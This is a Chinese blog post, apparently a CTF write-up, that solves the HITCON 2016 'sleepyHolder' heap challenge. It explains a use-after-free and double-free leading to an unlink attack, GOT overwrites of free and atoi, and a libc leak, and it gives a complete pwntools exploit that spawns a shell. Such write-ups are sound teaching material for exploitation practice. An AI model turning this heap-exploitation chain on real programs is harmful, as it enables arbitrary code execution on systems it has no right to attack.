我的技术与生活——sleepyHolder_hitcon_2016

例行检查

add函数，能分别申请一个0x28，0xfa0,0x61a80大小的堆一次

dele函数，存在UAF漏洞，指针没有清零，但是对应的数清零了，所以可以再次申请堆

这还有个edit函数

add(1,'AAAA') #堆0
add(2,'BBBB') #堆1

dele(1)
add(3,'cccc') #堆2

因为堆2太大所以free chunk会放在smallbin里

这里有个漏洞，double free堆0后再次申请堆0，堆1的size位还是0，所以可以利用unlink

再申请一次堆

1	add(1,'aaaa')

后面构造fake_chunk,然后dele(2),会unlink

1
2
3

payload=p64(0)+p64(0x21)+p64(fd)+p64(bk)+p64(0x20)
edit(1,payload)
dele(2) #unlink

注意堆0时0x6020d0,堆1时0x6020c0，刚开始不太清楚为什么后面要补这么多1，后面看向add函数，堆0，1，2分别对应着0x6020e0,d8,dc的地址,有则表示1,堆1虽已dele，但是只是为了后面方便改指针，全都写成1

1 2	payload=p64(0)+p64(elf.got['free'])+p64(0)+p64(0x6020c0)+p32(1)+p32(1)+p32(1) edit(1,payload) #8

1 2	edit(2,p64(0x400760)) #put_plt edit(1,p64(0x602020)) #puts_got

把free_got改写的内容改成puts_plt,可以执行puts函数，堆0的指针写上puts_got,然后dele堆1，就会打印出地址

然后算出偏移，算出system函数的地址，再edit堆0，0x6020c0

1 2	payload=p64(elf.got['atoi'])+p64(0)+p32(1)+p32(1)+p32(1) edit(1,payload)

再edit堆2，写上system的地址，

1	edit(2,p64(system))

主函数菜单那里还有个atoi函数，写上’sh’即可

exp

from pwn import*
from LibcSearcher import *
#p=remote("node4.buuoj.cn",)
p=process("./sleepyHolder_hitcon_2016")
context.log_level="debug"
context(arch='amd64')
elf=ELF('./sleepyHolder_hitcon_2016')
libc=ELF('libc-2.23.so')
def add(chose,content):
    p.sendlineafter('3. Renew secret\n','1')
    p.sendlineafter('What secret do you want to keep?',str(chose))
    p.sendafter('Tell me your secret: ',content)
 
def dele(index):
    p.sendlineafter('3. Renew secret\n','2')
    p.sendlineafter('Which Secret do you want to wipe?',str(index))

def edit(ch,content):
    p.sendlineafter('3. Renew secret\n','3')
    p.sendlineafter('Which Secret do you want to renew?',str(ch))
    p.sendafter('Tell me your secret: ',content)

add(1,'AAAA') 
add(2,'BBBB') 

dele(1)
add(3,'cccc') 

dele(1)
add(1,'aaaa') 

fd=0x6020d0-0x18
bk=0x6020d0-0x10

payload=p64(0)+p64(0x21)+p64(fd)+p64(bk)+p64(0x20)
edit(1,payload) #6

dele(2) #7 unlink


payload=p64(0)+p64(elf.got['free'])+p64(0)+p64(0x6020c0)+p32(1)+p32(1)+p32(1)
edit(1,payload)  #8


edit(2,p64(0x400760))
edit(1,p64(0x602020))

dele(2)

#dele(2)
p.recvuntil('2. Big secret')
puts_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print(hex(puts_addr))
base=puts_addr-libc.sym['puts']

system=base+libc.sym['system']

payload=p64(elf.got['atoi'])+p64(0)+p32(1)+p32(1)+p32(1)
edit(1,payload)


edit(2,p64(system))


p.sendlineafter('3. Renew secret\n','sh\n')

p.interactive()

站点信息

sleepyHolder_hitcon_2016

例行检查

add函数，能分别申请一个0x28，0xfa0,0x61a80大小的堆一次

dele函数，存在UAF漏洞，指针没有清零，但是对应的数清零了，所以可以再次申请堆

这还有个edit函数

因为堆2太大所以free chunk会放在smallbin里

这里有个漏洞，double free堆0后再次申请堆0，堆1的size位还是0，所以可以利用unlink

再申请一次堆

后面构造fake_chunk,然后dele(2),会unlink

注意堆0时0x6020d0,堆1时0x6020c0，刚开始不太清楚为什么后面要补这么多1，后面看向add函数，堆0，1，2分别对应着0x6020e0,d8,dc的地址,有则表示1,堆1虽已dele，但是只是为了后面方便改指针，全都写成1

把free_got改写的内容改成puts_plt,可以执行puts函数，堆0的指针写上puts_got,然后dele堆1，就会打印出地址

然后算出偏移，算出system函数的地址，再edit堆0，0x6020c0

再edit堆2，写上system的地址，

主函数菜单那里还有个atoi函数，写上’sh’即可

exp

评论区

目录

公告栏